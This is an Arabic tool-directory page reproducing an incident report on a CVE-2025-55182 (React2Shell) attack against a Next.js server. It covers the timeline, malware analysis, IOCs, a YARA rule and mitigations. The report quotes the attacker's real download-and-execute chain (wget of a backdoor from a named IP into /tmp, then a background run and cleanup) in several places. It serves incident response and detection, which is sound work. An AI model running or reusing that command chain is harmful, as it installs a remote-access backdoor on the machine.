Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-55182-Attack-Analysis — تحليل هجوم واقعي لـ CVE-2025-55182 (React2Shell) - ثغرة RCE في مكونات خادم React | Kitploit
أدوات/GitHubGitHub/ngvcanh/cve-2025-55182-attack-analysis
إدارة مؤشرات الاختراق (IOC)تحليل الثغرات الأمنيةالتحقيق الجنائي الرقميأمن الويبتحليل البرمجيات الخبيثةاستخبارات التهديداتالتعلم والتعليمالاستجابة للحوادث

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
GitHub
ngvcanh/cve-2025-55182-attack-analysis

CVE-2025-55182-Attack-Analysis

تحليل هجوم واقعي لـ CVE-2025-55182 (React2Shell) - ثغرة RCE في مكونات خادم React

عرض المستودع
6منذ 9 أشهرلم تتم المراجعة بعد

تحليل هجوم CVE-2025-55182: تنفيذ التعليمات البرمجية عن بُعد في مكونات React Server Components

تحليل هجوم واقعي على تطبيق Next.js إنتاجي

📋 جدول المحتويات

  • الملخص التنفيذي
  • نظرة عامة على الثغرة
  • الجدول الزمني للهجوم
  • التحليل الفني
  • تحليل البرمجيات الخبيثة
  • مؤشرات الاختراق (IOCs)
  • التخفيف والاستجابة
  • الدروس المستفادة
  • المراجع

الملخص التنفيذي

في 5 ديسمبر 2025، استهدف المهاجمون تطبيق Next.js الإنتاجي الخاص بنا مستغلين CVE-2025-55182 (React2Shell)، وهي ثغرة حرجة لتنفيذ التعليمات البرمجية عن بُعد في مكونات React Server Components. حاول الهجوم تنزيل وتنفيذ حصان طروادة (باب خلفي) على خادمنا لنظام Linux.

السمةالقيمة
معرف CVECVE-2025-55182
درجة CVSS9.8 (حرجة)
تاريخ الهجوم5 ديسمبر 2025
نتيجة الهجوم✅ تم الحظر (بعد التصحيح)
نوع البرمجية الخبيثةحصان طروادة باب خلفي لأنظمة Linux
المكدس المتأثرNext.js + React Server Components

نظرة عامة على الثغرة

ما هي CVE-2025-55182؟

CVE-2025-55182، المعروفة أيضًا باسم "React2Shell"، هي ثغرة حرجة لتنفيذ التعليمات البرمجية عن بُعد (RCE) تؤثر على مكونات React Server Components (RSC) في:

  • React: الإصدارات 19.0.0 - 19.2.1
  • Next.js: الإصدارات 15.x و 16.x (قبل التصحيحات)

السبب الجذري

توجد الثغرة في دالة renderToReadableStream() داخل Flight Server الخاص بـ React. عند معالجة حمولات RSC مصممة خصيصًا، يفشل الخادم في تعقيم بعض المدخلات بشكل صحيح، مما يؤدي إلى تنفيذ تعليمات برمجية عشوائية.

ناقل الهجوم

root@kitploit:~
Attacker → Malicious RSC Payload → Flight Server → eval() → RCE

يرسل المهاجم طلب POST معدًا مع حمولة متسلسلة ضارة يتم إلغاء تسلسلها وتنفيذها على الخادم.


الجدول الزمني للهجوم

المرحلة 1: محاولات الاستغلال الأولية (قبل التصحيح)

الطابع الزمني (UTC)الحدث
5 ديسمبر، 06:20اكتشاف أول هجوم عبر Sentry
5 ديسمبر، 06:20محاولة الحمولة تنفيذ أوامر الصدفة
5 ديسمبر، 06:20الهجوم ناجح جزئيًا (قبل التصحيح)

سجل خطأ Sentry (قبل التصحيح):

root@kitploit:~
Error: root
  at eval (eval at <anonymous>, <anonymous>:3:6)
  at nk (chunk.js)
  at JSON.parse (<anonymous>)
  at n5 (/app/node_modules/next/dist/server/app-render.js)

المرحلة 2: نشر التصحيح

الطابع الزمنيالإجراء
4 ديسمبر، 14:13الترقية إلى Next.js 16.0.7
4 ديسمبر، 14:13نشر الإصدار المصحح (v1.0.0-beta-4)

المرحلة 3: حظر الهجوم بعد التصحيح

الطابع الزمني (UTC)الحدث
5 ديسمبر، 08:48اكتشاف محاولة الهجوم
5 ديسمبر، 08:48تم حظر تنفيذ الحمولة
5 ديسمبر، 08:48خطأ: syntax error: unexpected ";"

سجل خطأ Sentry (بعد التصحيح):

root@kitploit:~
Error: Command failed: wget http://45.76.155.14/vim -O /tmp/vim ; 
chmod +x /tmp/vim ; nohup /tmp/vim > /dev/null 2>&1 & ; rm -f /tmp/vim
/bin/sh: syntax error: unexpected ";"

نجح التصحيح في منع تنفيذ الأمر الضار.


التحليل الفني

تفاصيل طلب الهجوم

السمةالقيمة
URL الهدفhttps://[REDACTED]/

تحليل الحمولة

حاول المهاجم تنفيذ سلسلة الأوامر التالية:

root@kitploit:~
wget http://45.76.155.14/vim -O /tmp/vim ; \
chmod +x /tmp/vim ; \
nohup /tmp/vim > /dev/null 2>&1 & ; \
rm -f /tmp/vim

تفصيل:

بيئة الخادم

المكونالإصدار
نظام التشغيلAlpine Linux 3.23.0
بيئة التشغيلNode.js v20.19.6
الإطارNext.js 16.0.7 (مصحح)

تحليل البرمجيات الخبيثة

معلومات الملف

نتائج VirusTotal

معدل الكشف: 13/72 (18%)

رابط VirusTotal: عرض التحليل

تحليل الملف الثنائي

رأس ELF:

root@kitploit:~
00000000: 7f45 4c46 0201 0100 0000 0000 0000 0000  .ELF............
00000010: 0200 3e00 0100 0000 60e7 4500 0000 0000  ..>.....`.E.....

الإمكانيات المحددة:

السلاسل المستخرجة (ذات الصلة):

root@kitploit:~
crypto/aes
crypto/tls
net/http
socks5
vendor/golang.org/x/crypto/chacha20poly1305
vendor/golang.org/x/net/http2/hpack

قواعد IDS التي تم تفعيلها

الخطورةالقاعدةالمصدر
منخفضةET POLICY HTTP traffic on port 443 (POST)Proofpoint ET Open
منخفضةET DNS Query for .cc TLDProofpoint ET Open

تصنيف البرمجية الخبيثة

النوع: حصان طروادة باب خلفي لأنظمة Linux

الإمكانيات:

  • الوصول إلى الصدفة عن بُعد
  • الاتصال بالخادم والتحكم (C2)
  • تحميل/تنزيل الملفات
  • الاتصالات المشفرة
  • تمرير حركة المرور عبر SOCKS5
  • آليات الثبات

مؤشرات الاختراق (IOCs)

مؤشرات الشبكة

مؤشرات الملفات

مؤشرات سلوكية

قاعدة YARA

root@kitploit:~
rule CVE_2025_55182_Backdoor {
    meta:
        description = "يكتشف الباب الخلفي الموزع عبر CVE-2025-55182"
        author = "باحث أمني"
        date = "2025-12-05"
        hash = "0f0f9c339fcc267ec3d560c7168c56f607232cbeb158cb02a0818720a54e72ce"
    
    strings:
        $elf = { 7F 45 4C 46 }
        $go1 = "vendor/golang.org/x/crypto" ascii
        $go2 = "vendor/golang.org/x/net" ascii
        $net1 = "net/http" ascii
        $net2 = "socks5" ascii
        $crypto1 = "crypto/tls" ascii
        $crypto2 = "chacha20poly1305" ascii
    
    condition:
        $elf at 0 and
        (2 of ($go*)) and
        (1 of ($net*)) and
        (1 of ($crypto*))
}

التخفيف والاستجابة

الإجراءات الفورية المتخذة

تقرير الإساءة

تم تقديم تقرير إساءة إلى Vultr (مزود استضافة خادم C2) في 5 ديسمبر 2025 يحتوي على:

  • عنوان IP الضار وURL
  • تجزئة SHA256 للبرمجية الخبيثة
  • رابط تحليل VirusTotal
  • وصف ناقل الهجوم (CVE-2025-55182)

الإصدارات المصححة

الحزمةالضعيفةالمصححة
Next.js< 15.3.3, < 16.0.5≥ 15.3.3, ≥ 16.0.5
React19.0.0 - 19.1.0≥ 19.2.1 (يونيو 2025+)

التخفيفات الموصى بها

1. الترقية فورًا:

root@kitploit:~
# لـ Next.js 16.x
npm install [email protected] [email protected] [email protected]

# لـ Next.js 15.x
npm install [email protected] [email protected] [email protected]

2. حظر IP الضار:

root@kitploit:~
# iptables
sudo iptables -A INPUT -s 45.76.155.14 -j DROP
sudo iptables -A OUTPUT -d 45.76.155.14 -j DROP

# UFW
sudo ufw deny from 45.76.155.14
sudo ufw deny to 45.76.155.14

3. مراقبة مؤشرات الاختراق:

root@kitploit:~
# التحقق من الملفات المشبوهة
find /tmp -type f -executable 2>/dev/null

# التحقق من العمليات المشبوهة
ps aux | grep -E "(vim|/tmp/)"

# التحقق من اتصالات الشبكة
netstat -an | grep "45.76.155.14"

4. تدوير جميع الأسرار:

  • بيانات اعتماد قاعدة البيانات
  • أسرار JWT
  • مفاتيح API
  • أسرار الجلسات

الدروس المستفادة

ما الذي سار بشكل جيد

  1. مراقبة Sentry التقطت الهجوم فورًا
  2. نشر التصحيح بسرعة في غضون ساعات من الكشف عن CVE
  3. الحاويات Docker حدت من نطاق الانفجار
  4. الحماية بعد التصحيح نجحت في حظر الهجمات اللاحقة

ما يمكن تحسينه

  1. التصحيح الأسرع - تقليل الوقت بين الكشف عن CVE والتصحيح
  2. قواعد جدار حماية تطبيقات الويب (WAF) - إضافة قواعد لكشف محاولات استغلال RSC
  3. تصفية الصادر - حظر الاتصالات الصادرة إلى عناوين IP غير معروفة
  4. التنبيهات الآلية - إعداد تنبيهات لأوامر الصدفة المشبوهة

التوصيات الأمنية


المراجع

الإعلانات الرسمية

  • نشرة أمنية من Next.js
  • تحديثات أمان React
  • تفاصيل CVE-2025-55182

موارد التحليل

  • تحليل VirusTotal
  • MalwareBazaar

الأدوات المستخدمة

  • Sentry - مراقبة الأخطاء
  • VirusTotal - تحليل البرمجيات الخبيثة
  • Docker - الحاويات

إخلاء المسؤولية

هذا التقرير منشور لأغراض تعليمية ودفاعية فقط. لا يتم تضمين الملف الثنائي للبرمجية الخبيثة في هذا المستودع. يمكن للباحثين الأمنيين الحصول على العينة عبر VirusTotal باستخدام تجزئة SHA256 المقدمة.


المؤلف

تاريخ النشر: 5 ديسمبر 2025

جهة الاتصال: [معلومات الاتصال الخاصة بك أو ملف GitHub]


الترخيص

يُتاح هذا التحليل بموجب CC BY 4.0. لك الحرية في مشاركة وتكييف هذه المادة مع الإسناد المناسب.


سجل التغييرات

التاريخالإصدارالتغييرات
2025-12-051.0النشر الأولي
تنزيل الأداة
الطريقة
POST
وكيل المستخدمPython Requests 2.31
المصدرنص هجوم آلي
الخطوةالأمرالغرض
1wget http://45.76.155.14/vim -O /tmp/vimتنزيل البرمجية الخبيثة
2chmod +x /tmp/vimجعل الملف قابلًا للتنفيذ
3nohup /tmp/vim > /dev/null 2>&1 &التشغيل في الخلفية، الاستمرار بعد تسجيل الخروج
4rm -f /tmp/vimحذف الأدلة
الحاويةDocker
السمةالقيمة
اسم الملفvim (متنكر كأداة شرعية)
SHA2560f0f9c339fcc267ec3d560c7168c56f607232cbeb158cb02a0818720a54e72ce
نوع الملفELF 64-bit LSB قابل للتنفيذ، x86-64
اللغةGo (ملف ثنائي مجمّع)
حجم الملف~4.7 MB
البائعاسم الكشف
DrWebLinux.BackDoor.Siggen.389
AhnLab-V3Backdoor/Linux.Agent.4780032
KasperskyHEUR:Trojan.Linux.Agent.gen
ESET-NOD32Linux/Agent.PX Trojan
Avast/AVGELF:Agent-BQE [Trj]
AliCloudTrojan:Linux/Agent.ff565f70
Antiy-AVLTrojan/Linux.Agent.px
RisingTrojan.Agent/Linux!8.13268
SentinelOneStatic AI - Suspicious ELF
TencentMalware.Linux.Generic.1c03c8b9
ZillyaTrojan.Agent.Linux.5292
الإمكانيةالدليل
عميل HTTP/HTTPSnet/http, *http.Client
تشفير TLScrypto/tls, crypto/aes
وكيل SOCKS5socks, socks5
حل DNSnet/dns/dnsmessage
تشفير قويchacha20poly1305, Ed25519
النوعالقيمةالوصف
عنوان IP45.76.155.14خادم توزيع البرمجية الخبيثة
URLhttp://45.76.155.14/vimرابط تنزيل البرمجية الخبيثة
الاستضافةVultr VPSمزود السحابة
النطاق الأعلى.ccنطاق C2 يستخدم .cc
النوعالقيمة
SHA2560f0f9c339fcc267ec3d560c7168c56f607232cbeb158cb02a0818720a54e72ce
SHA1[احسب إذا لزم الأمر]
MD5[احسب إذا لزم الأمر]
اسم الملفvim (متنكر)
نوع الملفELF 64-bit x86-64
حجم الملف~4.7 MB
المؤشرالوصف
wget إلى IP خارجيتنزيل من عناوين URL غير قياسية
ملفات في /tmp/ملف قابل للتنفيذ مشبوه في الدليل المؤقت
nohup + تشغيل في الخلفيةمحاولة ثبات
حذف الملف فورًاتنظيف الأدلة
وكيل المستخدم Python Requestsأداة هجوم آلية
الإجراءالحالةالتفاصيل
✅ ترقية Next.jsمكتمل16.0.4 → 16.0.7
✅ ترقية Reactمكتمل19.1.0 → 19.2.1 (مصحح)
✅ إعادة نشر التطبيقمكتملإعادة بناء Docker
✅ تحليل البرمجية الخبيثةمكتملإرسال إلى VirusTotal
✅ الإبلاغ لمزود الاستضافةمكتملإرسال تقرير إساءة إلى Vultr
⏳ تدوير الشهاداتمعلققاعدة البيانات، JWT، مفاتيح API
الفئةالتوصية
المراقبةتنفيذ مراقبة الأخطاء في الوقت الحقيقي (Sentry، إلخ)
التحديثاتالاشتراك في النشرات الأمنية لجميع التبعيات
الشبكةتنفيذ تصفية الصادر، حظر الصادر غير الضروري
الحاوياتالتشغيل كمستخدم غير جذر، استخدام أنظمة ملفات للقراءة فقط
الأسرارتدوير الشهادات بانتظام، استخدام مدير أسرار